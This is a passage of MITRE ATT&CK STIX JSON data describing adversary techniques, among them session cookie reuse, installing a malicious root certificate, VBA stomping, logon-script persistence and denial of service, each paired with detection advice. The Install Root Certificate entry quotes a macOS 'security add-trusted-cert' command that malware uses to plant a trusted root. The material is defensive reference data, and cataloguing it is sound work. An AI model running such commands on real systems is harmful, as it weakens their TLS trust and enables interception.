"https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Web Session Cookie", "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary then imports the cookie into a browser they control and is able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Johann Rehberger"], "x_mitre_detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Office 365", "SaaS"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Logon Credentials", "Multi-Factor Authentication"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c5e31fb5-fcbd-48a4-af8c-5a6ed5b932e5", "created": "2019-10-08T20:08:56.205Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1506", "external_id": "T1506"}, {"source_name": "Pass The Cookie", "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html"}, {"source_name": "Unit 42 Mac Crypto Cookies January 2019", "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved October 14, 2019.", "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-10-13T17:57:10.768Z", "name": "Screen Capture", "description": "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Command: Command Execution", "Process: OS API Execution"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0852", "external_id": "T0852"}, {"source_name": "ICS-CERT October 2017", "description": "ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2017/10/23 ", "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-01-04T20:01:27.662Z", "name": "Install Root Certificate", "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Matt Graeber, @mattifestation, SpecterOps", "Red Canary", "Travis Smith, Tripwire", "Itzik Kotler, SafeBreach"], "x_mitre_deprecated": false, "x_mitre_detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Digital Certificate Validation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", "created": "2020-02-21T21:05:32.844Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1553/004", "external_id": "T1553.004"}, {"source_name": "Operation Emmental", "description": "botconf eu. (2014, December 31). David Sancho - Finding Holes in Banking 2FA: Operation Emmental. Retrieved January 4, 2024.", "url": "https://www.youtube.com/watch?v=gchKFumYHWc"}, {"source_name": "SpectorOps Code Signing Dec 2017", "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.", "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec"}, {"source_name": "Kaspersky Superfish", "description": "Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.", "url": "https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/"}, {"source_name": "objective-see ay mami 2018", "description": "Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.", "url": "https://objective-see.com/blog/blog_0x26.html"}, {"source_name": "Microsoft Sigcheck May 2017", "description": "Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.", "url": "https://docs.microsoft.com/sysinternals/downloads/sigcheck"}, {"source_name": "Tripwire AppUNBlocker", "description": "Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.", "url": "https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/"}, {"source_name": "Wikipedia Root Certificate", "description": "Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.", "url": "https://en.wikipedia.org/wiki/Root_certificate"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Network Logon Script", "description": "Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. \n \nAdversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", "created": "2020-01-10T18:01:03.666Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1037/003", "external_id": "T1037.003"}, {"source_name": "Petri Logon Script AD", "description": "Daniel Petri. (2009, January 8). Setting up a Logon Script through Active Directory Users and Computers in Windows Server 2008. Retrieved November 15, 2019.", "url": "https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Endpoint Denial of Service", "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nIn cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\n\nFor attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Alfredo Oliveira, Trend Micro", "David Fiser, @anu4is, Trend Micro", "Magno Logan, @magnologan, Trend Micro", "Vishwas Manral, McAfee", "Yossi Weizman, Azure Defender Research Team"], "x_mitre_deprecated": false, "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace", "Containers"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "created": "2019-04-18T11:00:55.862Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1499", "external_id": "T1499"}, {"source_name": "Cisco DoSdetectNetflow", "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf"}, {"source_name": "FSISAC FraudNetDoS September 2012", "description": "FS-ISAC. (2012, September 17). Fraud Alert \u2013 Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019.", "url": "https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf"}, {"source_name": "ArsTechnica Great Firewall of China", "description": "Goodin, D.. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019.", "url": "https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/"}, {"source_name": "FireEye OpPoisonedHandover February 2016", "description": "Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong\u2019s Pro-Democracy Movement. Retrieved April 18, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html"}, {"source_name": "USNYAG IranianBotnet March 2016", "description": "Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.", "url": "https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged"}, {"source_name": "Symantec DDoS October 2014", "description": "Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019.", "url": "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Compile After Delivery", "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian", "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"], "x_mitre_detection": "Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Signature-based detection", "Host intrusion prevention systems", "Anti-virus", "Binary Analysis", "Static File Analysis"], "x_mitre_permissions_required": ["User"], "x_mitre_system_requirements": ["Compiler software (either native to the system or delivered by the adversary)"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "created": "2020-03-16T15:30:57.711Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/004", "external_id": "T1027.004"}, {"source_name": "ClearSky MuddyWater Nov 2018", "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.", "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf"}, {"source_name": "TrendMicro WindowsAppMac", "description": "Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Uncommonly Used Port", "description": "Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0", "created": "2017-05-31T21:30:53.408Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1065", "external_id": "T1065"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "System Location Discovery", "description": "\nAdversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Pooja Natarajan, NEC Corporation India", "Hiroki Nagahama, NEC Corporation", "Manikantan Srinivasan, NEC Corporation India", "Wes Hurd", "Katie Nickels, Red Canary"], "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW to gather information.(Citation: FBI Ragnar Locker 2020)\n\nMonitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS", "IaaS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", "created": "2021-04-01T16:42:08.735Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1614", "external_id": "T1614"}, {"source_name": "FBI Ragnar Locker 2020", "description": "FBI. (2020, November 19). Indicators of Compromise Associated with Ragnar Locker Ransomware. Retrieved April 1, 2021.", "url": "https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf"}, {"source_name": "Sophos Geolocation 2016", "description": "Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals target you based on where you live. Retrieved April 1, 2021.", "url": "https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/"}, {"source_name": "Bleepingcomputer RAT malware 2020", "description": "Abrams, L. (2020, October 23). New RAT malware gets commands via Discord, has ransomware feature. Retrieved April 1, 2021.", "url": "https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/"}, {"source_name": "AWS Instance Identity Documents", "description": "Amazon. (n.d.). Instance identity documents. Retrieved April 2, 2021.", "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html"}, {"source_name": "Microsoft Azure Instance Metadata 2021", "description": "Microsoft. (2021, February 21). Azure Instance Metadata Service (Windows). Retrieved April 2, 2021.", "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows"}, {"source_name": "Securelist Trasparent Tribe 2020", "description": "Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved April 1, 2021.", "url": "https://securelist.com/transparent-tribe-part-1/98127/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "VBA Stomping", "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero\u2019s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Rick Cole, Mandiant"], "x_mitre_detection": "Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)\n\nIf the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "x_mitre_system_requirements": ["MS Office version specified in _VBA_PROJECT stream must match host"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", "created": "2020-09-17T12:51:40.845Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/007", "external_id": "T1564.007"}, {"source_name": "FireEye VBA stomp Feb 2020", "description": "Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.", "url": "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html"}, {"source_name": "Evil Clippy May 2019", "description": "Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020.", "url": "https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/"}, {"source_name": "Microsoft _VBA_PROJECT Stream", "description": "Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020.", "url": "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239"}, {"source_name": "Walmart Roberts Oct 2018", "description": "Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping \u2014 Advanced Maldoc Techniques. Retrieved September 17, 2020.", "url": "https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278"}, {"source_name": "pcodedmp Bontchev", "description": 